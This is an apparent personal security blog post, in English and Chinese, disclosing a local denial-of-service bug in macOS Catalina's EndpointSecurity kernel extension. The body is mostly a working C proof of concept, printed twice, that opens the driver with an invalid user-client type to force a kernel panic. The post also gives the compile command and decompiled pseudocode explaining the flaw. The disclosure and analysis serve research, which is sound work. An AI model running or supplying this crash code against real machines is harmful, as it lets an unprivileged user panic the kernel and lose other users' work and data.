<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="a simple dos in the newly added kext">
<meta name="keywords" content="漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="local DOS on latest macOS">
<meta property="og:url" content="https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/index.html">
<meta property="og:site_name" content="Peterpan0927&#39;s Blog">
<meta property="og:description" content="a simple dos in the newly added kext">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2020-02-20T11:19:08.691Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="local DOS on latest macOS">
<meta name="twitter:description" content="a simple dos in the newly added kext">
    
    
        
          
              <link rel="shortcut icon" href="/images/P.png">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>local DOS on latest macOS</title>
    <!-- styles -->
    <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/lib/meslo-LG/styles.css">
    <link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <!-- rss -->
    
    
    <!-- jquery -->
    <script src="/lib/jquery/jquery.min.js"></script>
</head>

<body>
    <div class="banner">
<div id="blogtitel" class="blogtitel">Peterpan0927&#39;s Blog</div>
<ul id="wrapper" class="wrapper">
  <div class="sun">
    <div class="star"></div>
  </div>
  <div class="mercury">
    <div class="planet">
      <div class="shadow"></div>
    </div>
  </div>
  <div class="venus">
    <div class="planet">
      <div class="shadow"></div>
    </div>
  </div>
  <div class="earth">
    <div class="planet"><div class="shadow"></div></div>
  </div>
  <div class="mars">
    <div class="planet"><div class="shadow"></div></div>
  </div>
  <div class="jupiter">
    <div class="planet"><div class="shadow"></div></div>
  </div>
</ul>
</div>

    <div class="background">
      
        <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/Peterpan0927">Github</a></li>
         
          <li><a href="https://weibo.com/p/1005055999539768?is_all=1">Weibo</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2019/08/08/Chrome引擎漏洞分析及利用/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&text=local DOS on latest macOS"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&is_video=false&description=local DOS on latest macOS"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=local DOS on latest macOS&body=Check out this article: https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&name=local DOS on latest macOS&description=&lt;p&gt;a simple dos in the newly added kext&lt;/p&gt;"><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#poc"><span class="toc-number">1.</span> <span class="toc-text"> Poc</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">2.</span> <span class="toc-text"> 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#背景知识"><span class="toc-number">3.</span> <span class="toc-text"> 背景知识</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#poc-2"><span class="toc-number">4.</span> <span class="toc-text"> Poc</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#问题发生点"><span class="toc-number">5.</span> <span class="toc-text"> 问题发生点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#null"><span class="toc-number">6.</span> <span class="toc-text"> </span></a></li></ol>
    </div>
  </span>
</div>

      
      <div class="content index width mx-auto px2 my4">
          
          <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        local DOS on latest macOS
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Peterpan0927's Blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2020-02-20T07:54:09.000Z" itemprop="datePublished">2020-02-20</time>
    </div>


      
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link" href="/tags/漏洞/">漏洞</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>a simple dos in the newly added kext</p>
<a id="more"></a>
<h1 id="poc"><a class="markdownIt-Anchor" href="#poc"></a> Poc</h1>
<p>Let’s just go straight to the poc without too much bullshit:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;mach/mach_vm.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;IOKit/IOKitLib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc,<span class="keyword">char</span> *argv[])</span></span>&#123;</span><br><span class="line">  <span class="keyword">io_service_t</span> service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(<span class="string">"EndpointSecurityDriver"</span>));</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (service == IO_OBJECT_NULL)&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"unable to find service\n"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"got service: %x\n"</span>, service);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">kern_return_t</span> err;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="comment">// open a userclient:</span></span><br><span class="line">  <span class="keyword">io_connect_t</span> conn = MACH_PORT_NULL;</span><br><span class="line">   err = IOServiceOpen(service, mach_task_self(), <span class="number">8</span>, &amp;conn);</span><br><span class="line">  <span class="keyword">if</span> (err == KERN_SUCCESS)&#123;</span><br><span class="line">   	<span class="built_in">printf</span>(<span class="string">"get user client connection\n"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">//input data</span></span><br><span class="line">  <span class="keyword">uint64_t</span> input[<span class="number">10</span>];</span><br><span class="line">  <span class="keyword">uint32_t</span> value=<span class="number">0x0</span>;</span><br><span class="line">  <span class="built_in">memset</span>(input,<span class="number">0</span>,<span class="keyword">sizeof</span>(input));</span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"got userclient connection: %x\n"</span>, conn);</span><br><span class="line">  err = IOConnectCallMethod(conn,<span class="number">0x0</span>,input,value,<span class="literal">NULL</span>,<span class="number">0</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>);</span><br><span class="line">  <span class="keyword">if</span>(err != KERN_SUCCESS) <span class="built_in">printf</span>(<span class="string">"no\n"</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">printf</span>(<span class="string">"success\n"</span>);</span><br><span class="line">  IOServiceClose(conn);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>the bug can be triggered on the latest macOS Catalina(10.15.2),haven’t been tested on 10.15.3 yet.the Apple product security team does not regard it as a security problem,so i just release it.This vulnerability is just because the  <code>EndpointSecurity.kext</code> rewrite the <code>newUserClient</code> function with the logic problem,even if the type is wrong but not number 0 or 1,it will return <code>KERN_SUCCESS</code>.But the client doesn’t be created actually,finally to a null poiner dereference problem.we can find in the kernel panic log.</p>
<p>i take out the important part of the rewrited function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">EndpointSecurityDriver::newUserClient</span><span class="params">(__int64 a1, IOUserClient *a2, <span class="keyword">const</span> <span class="keyword">char</span> *a3, <span class="keyword">int</span> a4, __int64 a5, EndpointSecurityExternalClient **a6)</span></span></span><br><span class="line"><span class="function">v8 </span>= a4;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> ( v8 == <span class="number">1</span> )&#123;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ( v8 )</span><br><span class="line">    <span class="keyword">goto</span> LABEL_20;</span><br><span class="line">...</span><br><span class="line">v10 = <span class="number">0</span>;</span><br><span class="line">LABEL_20:</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)gLogLevel_ &gt;= <span class="number">4</span> )</span><br><span class="line">    _os_log_internal(</span><br><span class="line">      &amp;dword_0,</span><br><span class="line">      &amp;_os_log_default,</span><br><span class="line">      <span class="number">2L</span>L,</span><br><span class="line">      _ZZN22EndpointSecurityDriver13newUserClientEP4taskPvjP12OSDictionaryPP12IOUserClientE11_os_log_fmt__12_,</span><br><span class="line">      <span class="string">"virtual IOReturn EndpointSecurityDriver::newUserClient(task_t, void *, UInt32, OSDictionary *, IOUserClient **)"</span>);</span><br><span class="line">  <span class="keyword">return</span> v10;</span><br></pre></td></tr></table></figure>
<p>i believe any one who learn a few about the <code>IOKit</code> mechanism can understand what i said above.That’all,thanks for reading~Btw,i also post the blog on my Twitter.</p>
<hr>
<p>Chinese Version</p>
<h1 id="前言"><a class="markdownIt-Anchor" href="#前言"></a> 前言</h1>
<p>这个漏洞的具体表现形式为空指针解引用造成的<code>kernel panic</code>，由于苹果的安全团队评估之后认为不能造成具体的安全隐患，所以在这里放出来漏洞描述和poc，希望安全界的同行们能够互相学习交流。</p>
<h1 id="背景知识"><a class="markdownIt-Anchor" href="#背景知识"></a> 背景知识</h1>
<ol>
<li>了解苹果的<code>IOKit</code>机制，可以参考<code>OS X和iOS内核编程</code></li>
<li>用户态和内核扩展的交互</li>
</ol>
<h1 id="poc-2"><a class="markdownIt-Anchor" href="#poc-2"></a> Poc</h1>
<p>下面的代码在<code>macOS 10.15 beta</code>到<code>macOS 10.15.2</code>都是可以触发的，最新版本上还没有测试过：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;mach/mach_vm.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;IOKit/IOKitLib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc,<span class="keyword">char</span> *argv[])</span></span>&#123;</span><br><span class="line">  <span class="keyword">io_service_t</span> service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(<span class="string">"EndpointSecurityDriver"</span>));</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (service == IO_OBJECT_NULL)&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"unable to find service\n"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"got service: %x\n"</span>, service);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">kern_return_t</span> err;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="comment">// open a userclient:</span></span><br><span class="line">  <span class="keyword">io_connect_t</span> conn = MACH_PORT_NULL;</span><br><span class="line">   err = IOServiceOpen(service, mach_task_self(), <span class="number">8</span>, &amp;conn);</span><br><span class="line">  <span class="keyword">if</span> (err == KERN_SUCCESS)&#123;</span><br><span class="line">   	<span class="built_in">printf</span>(<span class="string">"get user client connection\n"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">//input data</span></span><br><span class="line">  <span class="keyword">uint64_t</span> input[<span class="number">10</span>];</span><br><span class="line">  <span class="keyword">uint32_t</span> value=<span class="number">0x0</span>;</span><br><span class="line">  <span class="built_in">memset</span>(input,<span class="number">0</span>,<span class="keyword">sizeof</span>(input));</span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"got userclient connection: %x\n"</span>, conn);</span><br><span class="line">  err = IOConnectCallMethod(conn,<span class="number">0x0</span>,input,value,<span class="literal">NULL</span>,<span class="number">0</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>);</span><br><span class="line">  <span class="keyword">if</span>(err != KERN_SUCCESS) <span class="built_in">printf</span>(<span class="string">"no\n"</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">printf</span>(<span class="string">"success\n"</span>);</span><br><span class="line">  IOServiceClose(conn);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译指令：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cc dos.c -framework IOKit -o dos</span><br></pre></td></tr></table></figure>
<p>接下来运行一下就可以直观的看到效果了，下面就来分析一下问题所在</p>
<h1 id="问题发生点"><a class="markdownIt-Anchor" href="#问题发生点"></a> 问题发生点</h1>
<p>通过对内核扩展的代码审计我们可以很容易的发现这其实是一个逻辑问题，<code>EndPointSecurity.kext</code>主动的重写了<code>newUserClient</code>这个方法，但如果<code>type</code>参数不是0或1的话依然会返回<code>KERN_SUCCESS</code>，<code>KERN_SUCCESS</code>就会让内核错误的认为函数调用成功，从而执行接下来的步骤，但事实上对应的<code>client</code>并没有得到成功的创建，所以在之后用到<code>client</code>事实上在内存中是并不存在的，最终就会表现为空指针报错，我将重写过的函数关键部分摘出来如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">EndpointSecurityDriver::newUserClient</span><span class="params">(__int64 a1, IOUserClient *a2, <span class="keyword">const</span> <span class="keyword">char</span> *a3, <span class="keyword">int</span> a4, __int64 a5, EndpointSecurityExternalClient **a6)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">v8 = a4;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> ( v8 == <span class="number">1</span> )&#123;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ( v8 )</span><br><span class="line">    <span class="keyword">goto</span> LABEL_20;</span><br><span class="line">...</span><br><span class="line">v10 = <span class="number">0</span>;</span><br><span class="line">LABEL_20:</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)gLogLevel_ &gt;= <span class="number">4</span> )</span><br><span class="line">    _os_log_internal(</span><br><span class="line">      &amp;dword_0,</span><br><span class="line">      &amp;_os_log_default,</span><br><span class="line">      <span class="number">2L</span>L,</span><br><span class="line">      _ZZN22EndpointSecurityDriver13newUserClientEP4taskPvjP12OSDictionaryPP12IOUserClientE11_os_log_fmt__12_,</span><br><span class="line">      <span class="string">"virtual IOReturn EndpointSecurityDriver::newUserClient(task_t, void *, UInt32, OSDictionary *, IOUserClient **)"</span>);</span><br><span class="line">  <span class="keyword">return</span> v10;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>也就是说我们在用户态的调用<code>IOServiceOpen</code>的时候只要传递的<code>type</code>参数不是0或1就会触发<code>panic</code>，从这个角度我们也可以发现苹果的一些代码质量并不是很高，从这些角度出发，我们可能会发现一些意想不到的问题，针对薄弱点进行攻击相对来说是一种省时省力的方式。</p>
<h1 id><a class="markdownIt-Anchor" href="#"></a> </h1>

  </div>
</article>



      </div>
      
       <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/Peterpan0927">Github</a></li>
         
          <li><a href="https://weibo.com/p/1005055999539768?is_all=1">Weibo</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#poc"><span class="toc-number">1.</span> <span class="toc-text"> Poc</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">2.</span> <span class="toc-text"> 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#背景知识"><span class="toc-number">3.</span> <span class="toc-text"> 背景知识</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#poc-2"><span class="toc-number">4.</span> <span class="toc-text"> Poc</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#问题发生点"><span class="toc-number">5.</span> <span class="toc-text"> 问题发生点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#null"><span class="toc-number">6.</span> <span class="toc-text"> </span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&text=local DOS on latest macOS"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&is_video=false&description=local DOS on latest macOS"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=local DOS on latest macOS&body=Check out this article: https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&title=local DOS on latest macOS"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://peterpan0927.github.io/2020/02/20/local-DOS-on-latest-macOS/&name=local DOS on latest macOS&description=&lt;p&gt;a simple dos in the newly added kext&lt;/p&gt;"><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

      
      <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2023 Peterpan0927
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/Peterpan0927">Github</a></li>
         
          <li><a href="https://weibo.com/p/1005055999539768?is_all=1">Weibo</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

      <script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- Google Analytics -->

<!-- Disqus Comments -->


    </div>
</body>
</html>
